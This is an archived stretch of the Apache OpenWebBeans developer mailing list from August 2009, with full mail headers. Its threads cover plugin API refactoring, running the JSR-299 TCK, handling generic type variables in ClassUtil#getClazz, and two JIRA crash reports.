b=I+FvYFp6j5ejTt+0j0IqcIjNGic1wPLQ5tubltwPuknvDvucUe8Jd+juwqMcciRE6gkXZayKKYGwGB6EGlV222fAevnWlqYJ7VjfPYl2qhtBZdUE+3WDN720rm78X7Ntzh5dUQCAIOV7de7h16Zr09ET+isKYXXKoev99+yunxM=; Message-ID: <[email protected]> X-YMail-OSG: UZOL7pgVM1kLjMmW7uUyGtaOaGPXfSpt7ttd6Vjd2p40kS0lZQyBmKVsLeQ05MfB8Ihgdg8kawP6Bu.7tEsP.2F6WO_y4p1fOhkMEGhFFpxbMX6Lyf_7978uegX1KhQwS7CPHmIDIZh2g3bm0ealSrh53HjlSVYNSITf.fHLouPbGAfc2M76GIErTjmhMTnjRZ515.PnyPHtyvDjWTGaAuflRJf6UHubB9u_S5dSmq6QfaswXNFWu9hPwC9AeeutjGWFBqNl5o3PPpYuIv0Xnu2ShdUdSStkTrulc_FFRtiXTTRhXMvBB28oNGw_LkM.XA-- Received: from [161.129.204.104] by web27802.mail.ukl.yahoo.com via HTTP; Sun, 09 Aug 2009 10:37:31 GMT X-Mailer: YahooMailRC/1358.27 YahooMailWebService/0.7.289.15 Date: Sun, 9 Aug 2009 10:37:31 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: [RFC] refactoring of our plugin API To: [email protected] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked by ClamAV on apache.org Hi! I grabed a lot of info this week and now like to hear what you think of the following approach. Currently our plugin API (org.apache.webbeans.plugins.OpenWebBeansPlugin) has a lot functions which have simply been taken from our original internal implementation and changed to be iterable over all registered plugins. Since about 2 month, the JSR-299 spec contains a lot of SPI interfaces itself, and while they most times don't force us to change our internal architecture, it sometimes would make more sense to strongly adopt it. So I e.g. ask myself if it would be a good idea to completely rewrite our plugin API and only check if the plugin provides functionality for a specific use case and return the proper spi interface if it likes to handle it. e.g. instead of public void isManagedBean(Class<?> clazz) throws WebBeansConfigurationException; public Object injectResource(Type type, Annotation[] annotations); we may also define a Producer<T> handleProduction(Class<T> clazz); (maybe we need additional parameters) If a certain plugin likes to handle the clazz, it returns the Producer for it. E.g. if the clazz is a @Stateful session bean, the EjbPlugin will return a EjbBeanProducerImpl or something. I'm not sure if you can follow my thoughts, but I hope you get the direction. It's basically about moving the plugin API to a higher abstraction level and not dealing with as much implementation details as we currently do. wdyt? LieGrue, strub From [email protected] Sun Aug 09 18:03:24 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 84582 invoked from network); 9 Aug 2009 18:03:24 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Aug 2009 18:03:24 -0000 Received: (qmail 56047 invoked by uid 500); 9 Aug 2009 18:03:32 -0000 Delivered-To: [email protected] Received: (qmail 56017 invoked by uid 500); 9 Aug 2009 18:03:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 56007 invoked by uid 99); 9 Aug 2009 18:03:31 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 09 Aug 2009 18:03:31 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO web38201.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Sun, 09 Aug 2009 18:03:22 +0000 Received: (qmail 10512 invoked by uid 60001); 9 Aug 2009 18:03:01 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1249840980; bh=rnDYelXjsu5NEwIb7NL9X4tvEG/P8FsDZd2/T+yfmHI=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=Y8bxThP2adu0hKxHT/K/40oxc9zrza/S64/PBx6Pi7QSyyCKIG+3b41xteowc5w8Bx19Trs4clyP3Qr+MGrsSDVmGYMOxFCA/exCZn8WvIjl3e9vd0T0kGKPWIowm10MnqF9RE2Zt7Bt1yGpQDdZHKPLtwkwxOAPcwPc/DdwSJQ= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=maZ5FKDN7NKt+EICLL0pICIMse1CK1RJaZJlxGjxhiIyXoD8/Aa24Kd3Pd7Dsevr9Bpx6syFZN+VInrmrfLkzLiBwEqXwwNjUaImCjsJznj8yXckChC2WPpSAMyzlI1ppWgp7Lm7wxIm1RG2oOWBwDMxE6rZuVjgdcZQfAYMjXs=; Message-ID: <[email protected]> X-YMail-OSG: 5_E1gFgVM1nxj4eMRMlKkLR3qmSGEGt5W3X0pSJdNZotDFXZ6KDnA2JVs2G1z0k5LthJVEoAKQebz0gdiRmcHXMewijiIoG_O_K0O_FbtO4g9dKW3OhQt14JtI.yFKJiAv9BmHnjOfvwv5LzLFhnpZieDgte4ho4lo15.Dpc22OISP8ma2XE4NDm0coBct16t_oPNZyLufkbjf64ewBIzWu71yiVnQVMK5qgwA8dm0ROaY8LAYEKtjmrZi6qJy4MlkQJwGSIWw5iEuxUyu8JTWAkuHbR3t6ldVYF_XOi5BeCVTHje0jmH2Mzq78byJR0cz8TGXUbVk0HgxpHwGAgOx6OqkK6_Iu_e01LEAB4tQ-- Received: from [161.129.204.104] by web38201.mail.mud.yahoo.com via HTTP; Sun, 09 Aug 2009 11:03:00 PDT X-Mailer: YahooMailRC/1358.27 YahooMailWebService/0.7.289.15 References: <[email protected]> Date: Sun, 9 Aug 2009 11:03:00 -0700 (PDT) From: Gurkan Erdogdu <[email protected]> Subject: Re: [RFC] refactoring of our plugin API To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-921375359-1249840980=:10148" X-Virus-Checked: Checked by ClamAV on apache.org --0-921375359-1249840980=:10148 Content-Type: text/plain; charset=us-ascii Hi Mark; Could you look at the EJB plugin that I wrote ? . It is not generic and it handles all of the EJB use cases defined in the spec.(i.e, OpenWebBeansEJBPlugin defines SPI that provides necessary hooks for WebBeans container.) I also thought about your concern that all of the plugin functionalities must be based on specific SPIs like I did for EJB. For example, I will write OpenWebBeansResourcePlugin that will define resource injections SPI, like this public class OpenWebBeansResourcePlugin extends OpenWebBeansPlugin { public Object injectEjb(EjbDescriptor blabla); public Object injectWebService(WebServiceDesciriptor blabla); public Object injectEntityManager(EntityManager blabla) } Than, I will implement this for OpenEjb container. Currently, we have other plugins that work more like a service - OpenWebBeansJmsPlugin - OpenWebBeansJpaPlugin - OpenWebBeansJsfPlugin As you said, definitely we have to convert those plugin codes into a specific plugin code like I did for ejbs.Also we can remove the JPA plugin because I will write generic resource plugin for container injections. I think that there is no need to refactor now. Because those plugins do not hurt our implementation for the time being. But if we add another plugin, we definitely implement it for producing a special SPI methods like Ejb plugin does. But, if you think that some re-factoring is good, then go ahead and do it :) Thanks; Gurkan ________________________________ From: Mark Struberg <[email protected]> To: [email protected] Sent: Sunday, August 9, 2009 1:37:31 PM Subject: [RFC] refactoring of our plugin API Hi! I grabed a lot of info this week and now like to hear what you think of the following approach. Currently our plugin API (org.apache.webbeans.plugins.OpenWebBeansPlugin) has a lot functions which have simply been taken from our original internal implementation and changed to be iterable over all registered plugins. Since about 2 month, the JSR-299 spec contains a lot of SPI interfaces itself, and while they most times don't force us to change our internal architecture, it sometimes would make more sense to strongly adopt it. So I e.g. ask myself if it would be a good idea to completely rewrite our plugin API and only check if the plugin provides functionality for a specific use case and return the proper spi interface if it likes to handle it. e.g. instead of public void isManagedBean(Class<?> clazz) throws WebBeansConfigurationException; public Object injectResource(Type type, Annotation[] annotations); we may also define a Producer<T> handleProduction(Class<T> clazz); (maybe we need additional parameters) If a certain plugin likes to handle the clazz, it returns the Producer for it. E.g. if the clazz is a @Stateful session bean, the EjbPlugin will return a EjbBeanProducerImpl or something. I'm not sure if you can follow my thoughts, but I hope you get the direction. It's basically about moving the plugin API to a higher abstraction level and not dealing with as much implementation details as we currently do. wdyt? LieGrue, strub --0-921375359-1249840980=:10148-- From [email protected] Sun Aug 09 18:08:23 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 86466 invoked from network); 9 Aug 2009 18:08:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Aug 2009 18:08:23 -0000 Received: (qmail 57454 invoked by uid 500); 9 Aug 2009 18:04:57 -0000 Delivered-To: [email protected] Received: (qmail 57448 invoked by uid 500); 9 Aug 2009 18:04:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 57438 invoked by uid 99); 9 Aug 2009 18:04:57 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 09 Aug 2009 18:04:57 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO web38203.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Sun, 09 Aug 2009 18:04:48 +0000 Received: (qmail 33184 invoked by uid 60001); 9 Aug 2009 18:04:26 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1249841066; bh=m/BxTJUu7Hoqe48FTQCH/kYLreS8byGBJ4TvOWQWTRI=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type; b=bERUHwwtkHwWBmpvuXEn1CQosHLkhg9ok5XvE+7cTGMkWjvdhksAHxhkz7V/aBeCC5LZpOqgbebJSaTV6mnmD9jw4WNUlzB69SKAYXDU9njh4svvsbZUmQxsVVeiVgon74cLFKqdD0lyK7rI5paOLw2uF0KU+fdSmsMUwQ9Tiy0= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:MIME-Version:Content-Type; b=bx7GlQNiUiRtsmPn89XwRQayhbVZnb+T71lSN98P350b8AqqJSpGvojxkoObAYGyEOiCaT+YtSIKjtjJ4BCDOyrGxt4q9LAM7SL2o4GLsEnpH3E29ShlsnannsA2nKpNIGDRKLGrfX9NWwr8BKsUSsLeggKw3O8fCN4KxNmkO5A=; Message-ID: <[email protected]> X-YMail-OSG: JVb0I9gVM1mfLiIi2U86sPB9TAr47nLhEsgihHTIpIZvnNkrQ2DZ82RRhWum74GD7YnmBw2vEjH1ao8xIzYo.blIPorDuFbkkFJPuzHHQtL02fgklsytaegXfye2FjhKf8eLzemVD4gMPxIUSfJYgZ14ObRlWkl.mZOtY0.Wv5FrWOGbUimMIfYgLGdm.Q.vx4YfPQu5lPGvLAdy9XHnhnzvnEsxNFmkBsiB7E99Z8cZr4.dPa4WpYPw8fliXLJiLuMJKx4i0qdtjPLwHVimn9_5efTE7tFPq9JjZIddv3Za1gxsK2Hiha7V5mylJ4VNWDmVvou7Uzw- Received: from [161.129.204.104] by web38203.mail.mud.yahoo.com via HTTP; Sun, 09 Aug 2009 11:04:26 PDT X-Mailer: YahooMailRC/1358.27 YahooMailWebService/0.7.289.15 Date: Sun, 9 Aug 2009 11:04:26 -0700 (PDT) From: Gurkan Erdogdu <[email protected]> Subject: webbeans-tck current situation To: [email protected] MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-203775425-1249841066=:32695" X-Virus-Checked: Checked by ClamAV on apache.org --0-203775425-1249841066=:32695 Content-Type: text/plain; charset=us-ascii Hi Mark; What is the current situation of the TCK? Is there any progress ? Do we able to run TCK tests now? Thanks; /Gurkan --0-203775425-1249841066=:32695-- From [email protected] Sun Aug 09 18:46:30 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 6013 invoked from network); 9 Aug 2009 18:46:30 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Aug 2009 18:46:30 -0000 Received: (qmail 75508 invoked by uid 500); 9 Aug 2009 18:46:37 -0000 Delivered-To: [email protected] Received: (qmail 75479 invoked by uid 500); 9 Aug 2009 18:46:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 75467 invoked by uid 99); 9 Aug 2009 18:46:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 09 Aug 2009 18:46:37 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO web27806.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Sun, 09 Aug 2009 18:46:25 +0000 Received: (qmail 25140 invoked by uid 60001); 9 Aug 2009 18:46:03 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1249843563; bh=kDtHjoAZMu7Tp5iS3BDt4oiskxoImyngaY7wB7kXskY=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=nvqMNNsFxcQL22LWa7upBoOfOt0l42dfFYEvtTx3yNvyiEfLPL6DRNwc0jLuAuaN79Fx/MDmc3Lnq4+uF/6M9jncKw5MEgvigXLxYMHnRFdp5giR4cWUh5x+3Z8MFn8fpcEvJ6Kc6WuA69uMNJuwidGuMqM9PkuUKLJXHEYLtVE= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=QR6FDm/3yVsK76IusTjLC5EbuzZfrHqFjk2bvivsgBGdAlxG+04DuHgFD5Q0eaW9YZifntqzrScJTPCTu3zLd1jrL3tBnHmN9hcIgKahpa3abFFPcsSG2OPOglArmWLaohSHB6LbESyjNsCPsiTdpbIXi0DxnAPik0PpONSvLaY=; Message-ID: <[email protected]> X-YMail-OSG: kQ8NpbkVM1nknbGTaHs2.gUfnBIU.w4qNvjRhkhfi9iT5AAhy6JElbjv28FZt5C8fps8pbIudncDjFNFrUBI83t_FlL7tBvrRaE_ysbU8RH_J8sOaqKkvFnOYso7WyTcoOEjfM5P7vVqdpKX4mBz5FJCb57lLTaO2YCzoz4ku6vjo8YnUamL12LUq9Wjt39b6CbMmo8N0rYPPEAorxOy7nJyhxXEoGdvQWLhFiCmM8Y_JiwJULGXoehhpk8Y6EC3Bqlt2DEeqGf8gY5e9VQAdqTlHE0UH_kS5vqYSe1T38a4WFSKhz7jrwU5BhH5wyRxsJuiUYUirRW_0LqfFmqxPrRvm9KcrWvyGNCfsg-- Received: from [161.129.204.104] by web27806.mail.ukl.yahoo.com via HTTP; Sun, 09 Aug 2009 18:46:03 GMT X-Mailer: YahooMailRC/1358.27 YahooMailWebService/0.7.289.15 References: <[email protected]> Date: Sun, 9 Aug 2009 18:46:03 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: Re: webbeans-tck current situation To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked by ClamAV on apache.org I can run the TCK, but I did a few dirty tricks. I'd like to discuss them with you before I check them in. I'll be in IRC the next few hours. LieGrue, strub ----- Original Message ---- > From: Gurkan Erdogdu <[email protected]> > To: [email protected] > Sent: Sunday, August 9, 2009 8:04:26 PM > Subject: webbeans-tck current situation > > Hi Mark; > > What is the current situation of the TCK? Is there any progress ? Do we able to > run TCK tests now? > > Thanks; > > /Gurkan From [email protected] Sun Aug 09 21:06:03 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 38531 invoked from network); 9 Aug 2009 21:06:03 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Aug 2009 21:06:03 -0000 Received: (qmail 28563 invoked by uid 500); 9 Aug 2009 21:06:10 -0000 Delivered-To: [email protected] Received: (qmail 28534 invoked by uid 500); 9 Aug 2009 21:06:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 28524 invoked by uid 99); 9 Aug 2009 21:06:10 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 09 Aug 2009 21:06:10 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO web27807.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Sun, 09 Aug 2009 21:05:59 +0000 Received: (qmail 10386 invoked by uid 60001); 9 Aug 2009 21:05:36 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1249851936; bh=orULeyRQeJnc9Hus5U9DbdXPnAcnZwXCddRQpf7s8rU=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=ee5byPSb6JC8FOceJFlS4LAAhZX9+RYbvQhJeliSLHS5jdfogid60sIjou8m58Tfb1pANkdnZdRXUlPWq2unpZOZLhBm6EYx7m+beCv9/NVL5X1KSTcBtSCfaiQM2ikMya8023W6vs8ssjoHXCdxNMTuX3NQw/znXb05KjoZ6Ao= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:References:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type; b=0FGtJ5ZjB4/Odyi+vEWUxEo0ZlYaUPWQ6I9h/0mIBYhn31yhI0H+fNDv17mzkLQwTDh2FVFZui8xCZf+f7HjLofrYrxzTtO8YJumJxaAx47yostNXLVd9/3TpTVCsy8oiBD/nJXkXEYi4sAAw+pzkKwkylziIgtQZw2QqodETys=; Message-ID: <[email protected]> X-YMail-OSG: 1WGYOjMVM1nDCqxIDJwJwN4Y_IEt6Pr7olg4hYGr_qSXazXID9sndH2h06i3LVyt4M1pYy0jZC6Afwy7buZC9YbmdsYUBusE37ITJIgNJWcxShtdUN5QVrBUCeonlWmPrC_UQ_SYqjJtDROIQuADB2HvvKui6CDOjUtY1uYqwmFNXWIg3NyWxp0VujXr67OnklTE9j4BL7LfT_a4g8Zn4McMbVaSF8hOT5g6aeKmSqjZAFemzwRC7VzObnfRtB_FqOtxF5rdLv_msxMKeW9Xl3U72QehqKZxeqvpRUXAe6nhHYQOsn7kJWL_aAErumvZQ6UUReUBfr0MVhtSeorWOFaq7EoEWDm5FBvrRYU3dA-- Received: from [161.129.204.104] by web27807.mail.ukl.yahoo.com via HTTP; Sun, 09 Aug 2009 21:05:35 GMT X-Mailer: YahooMailRC/1358.27 YahooMailWebService/0.7.289.15 References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Sun, 9 Aug 2009 21:05:35 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: Re: generic classes allowed as bean type? To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Virus-Checked: Checked by ClamAV on apache.org Oki, a few thoughts about ClassUtil#getClazz: this function is mainly used to get the list of 'boundary types' e.g. when parsing member methods of an annotated class. In the case mentioned below, I get a TypeVariable, but I do not get the actually used Type from the class. Reason is that in the caller down below a getGenericParameterType() is now called instead of getParameterType() which has been used previously. But sadly with only the generic TypeVariable, there is imho now way to detect the actually compiled type from the b-code. So if we would had the chance to detect e.g. a single upper bound which is not Object, should we use it? ((TypeVariable)type).getBounds()[0]; ? my current code hack: public static Class<?> getClazz(Type type) { Class<?> raw = null; if(type instanceof ParameterizedType) ... else if(type instanceof GenericArrayType) ... else if (type instanceof TypeVariable) { return Object.class; // maximum upper boundary, or should we return null? } return raw; } LieGrue, strub ----- Original Message ---- > From: Gurkan Erdogdu <[email protected]> > To: [email protected] > Sent: Tuesday, August 4, 2009 1:50:49 PM > Subject: Re: generic classes allowed as bean type? > > Awesome! talk later than. > > thanks > Gurkan > > > 2009/8/4, Mark Struberg : > > > > Hi Gurkan! > > > > First, thanks for your answer! > > 2nd, enjoy your holidays :) > > > > I already found section 5.3.3 which answered my question. > > In general this usecase is a valid one, and is also covered in the TCK. > > > > Locally, I did a really dirty hack by returning Object.class as upper > > boundary from the type erasure for now (in ClassUtil#getClazz). > > I didn't check this in, but now I'm at least able to continue with the TCK > > hacking. > > > > LieGrue, > > strub > > > > > > > > ----- Original Message ---- > >> From: Gurkan Erdogdu > >> To: [email protected] > >> Sent: Tuesday, August 4, 2009 1:32:07 PM > >> Subject: Re: generic classes allowed as bean type? > >> > >> more on this, type variable is not valid bean injection type. you can > >> not resolve any bean to injection point with type variables. > >> > >> hope this helps; > >> > >> 2009/8/2, Mark Struberg : > >> > > >> > Hi! > >> > > >> > While trying to run the TCK suite, I came across a problem while parsing > >> > the > >> > class > >> > > >> > public class MockCreationalContextimplements CreationalContext; > >> > > >> > with WebBeansLifecycle#applicationStarted > >> > > >> > The problem is the generic type T (a javax.reflect.generic.TypeVariable) > >> > which doesn't resolve to a 'real' class and since crashes OWB. > >> > > >> > How do we solve this? From reading the spec I cannot even say if this is > >> > a > >> > valid bean [email protected]. > >> > On the on hand it is not listed in the taxative list of valid bean > >> > types. > >> > On the other hand, an example with an _applied_ type is shown in the > >> > spec > >> > (class BookShop implements Shop) > >> > > >> > Gurkan, are you online tomorrow evening? > >> > > >> > LieGrue, > >> > strub > >> > > >> > > >> > > >> > > >> > >> > >> -- > >> Gurkan Erdogdu > >> http://gurkanerdogdu.blogspot.com > > > > > > > > > > > > > -- > Gurkan Erdogdu > http://gurkanerdogdu.blogspot.com From [email protected] Sun Aug 09 21:14:29 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 42902 invoked from network); 9 Aug 2009 21:14:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Aug 2009 21:14:29 -0000 Received: (qmail 33103 invoked by uid 500); 9 Aug 2009 21:14:36 -0000 Delivered-To: [email protected] Received: (qmail 33074 invoked by uid 500); 9 Aug 2009 21:14:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 33064 invoked by uid 99); 9 Aug 2009 21:14:36 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 09 Aug 2009 21:14:36 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 09 Aug 2009 21:14:34 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C19A4234C004 for <[email protected]>; Sun, 9 Aug 2009 14:14:14 -0700 (PDT) Message-ID: <747343099.1249852454778.JavaMail.jira@brutus> Date: Sun, 9 Aug 2009 14:14:14 -0700 (PDT) From: "Mark Struberg (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-128) OWB crashes while parsing methods with generic parameters MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org OWB crashes while parsing methods with generic parameters --------------------------------------------------------- Key: OWB-128 URL: https://issues.apache.org/jira/browse/OWB-128 Project: OpenWebBeans Issue Type: Bug Reporter: Mark Struberg Assignee: Mark Struberg currently ClassUtil#getClazz returns null for a generic TypeVariable {noformat} public class MyClass<T extends MyOtherClass> { public void myFn(T myParam){ } } {noformat} In this example myParam is a generic TypeVariable which will be erased in the b-code of the class file to whatever maximum upper bound has been defined. We either have to handle the compiled upper bound correctly or handle the return of a null value without crashing. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Aug 09 23:00:30 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 50080 invoked from network); 9 Aug 2009 23:00:30 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 9 Aug 2009 23:00:30 -0000 Received: (qmail 71118 invoked by uid 500); 9 Aug 2009 23:00:36 -0000 Delivered-To: [email protected] Received: (qmail 71089 invoked by uid 500); 9 Aug 2009 23:00:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 71079 invoked by uid 99); 9 Aug 2009 23:00:36 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 09 Aug 2009 23:00:36 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 09 Aug 2009 23:00:34 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id C7AB9234C044 for <[email protected]>; Sun, 9 Aug 2009 16:00:14 -0700 (PDT) Message-ID: <1214247913.1249858814806.JavaMail.jira@brutus> Date: Sun, 9 Aug 2009 16:00:14 -0700 (PDT) From: "Mark Struberg (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (OWB-129) OWB crashes on creating disposer method MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org OWB crashes on creating disposer method --------------------------------------- Key: OWB-129 URL: https://issues.apache.org/jira/browse/OWB-129 Project: OpenWebBeans Issue Type: Bug Reporter: Mark Struberg Assignee: Gurkan Erdogdu DefinitionUtil#createDisposalMethodsWithRealizations tries to resolve the producer method for the current disposal function. This doesn't work if the @Produces and @Disposal are defined inside the same bean, cause the producerMethods will only be registered afterwards. Set<Bean<?>> set = InjectionResolver.getInstance().implResolveByType(type, annot); returns an empty Set in this case. I think we may safely continue in this case, because the disposal method seems to be detected nontheless it seems. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Sun Aug 16 20:18:40 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 20457 invoked from network); 16 Aug 2009 20:18:39 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Aug 2009 20:18:39 -0000 Received: (qmail 53595 invoked by uid 500); 16 Aug 2009 20:18:46 -0000 Delivered-To: [email protected] Received: (qmail 53563 invoked by uid 500); 16 Aug 2009 20:18:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <openwebbeans-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 53545 invoked by uid 99); 16 Aug 2009 20:18:46 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 16 Aug 2009 20:18:46 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO web38208.mail.mud.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Sun, 16 Aug 2009 20:18:35 +0000 Received: (qmail 93982 invoked by uid 60001); 16 Aug 2009 20:18:14 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.com; s=s1024; t=1250453894; 